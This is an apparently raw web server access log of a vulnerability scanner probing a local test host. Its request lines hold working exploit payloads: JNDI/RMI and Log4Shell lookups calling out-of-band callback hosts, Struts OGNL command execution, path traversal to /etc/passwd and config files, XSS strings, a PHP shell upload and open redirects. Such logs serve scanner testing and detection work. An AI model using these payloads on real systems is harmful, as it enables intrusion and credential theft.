+{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\x22,\x0D\x0A \x22jndiNames\x22:\x22rmi://ca28fg0smpvbd3qg07h01oictxw7qox5r.oast.live/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.min.js HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F127.0.0.1%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/media/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"29KD211ek8pbrqZwKxvUAThvUue","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /testing-put.txt HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/docs/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD22w3ueBEEOrXPY58YpQFZAG?cmd=id HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blog/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/latest_runs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.ca28fg0smpvbd3qg07h0b44t7bpi1nxkz.oast.live/test}&url=https://localhost HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22br.com.anteros.dbcp.AnterosDBCPConfig\x22,\x0D\x0A \x22metricRegistry\x22:\x22rmi:/ca28fg0smpvbd3qg07h0un88tuoemr4tu.oast.live/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\x5C&refurl=}}};alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ampps-admin/index.php?act=login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testing-put.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/jobs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/ci.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?view=log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aworkreap_award_temp_file_uploader\x0D\x0A-----------------------------cd0dc6bdc00b1cf9\x0D\x0AContent-Disposition: form-data; name=\x22award_img\x22; filename=\x2229KD1rzKGMyBwDk4UPyJTg9xe0p.php\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------cd0dc6bdc00b1cf9--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v4/graphiql/finland HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?aiowpsec_do_log_out=1&after_logout=https://attacker.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.vscode/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gsearch.php.en?prod=';prompt`document.domain`;// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /EemAdminService/EemAdmin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 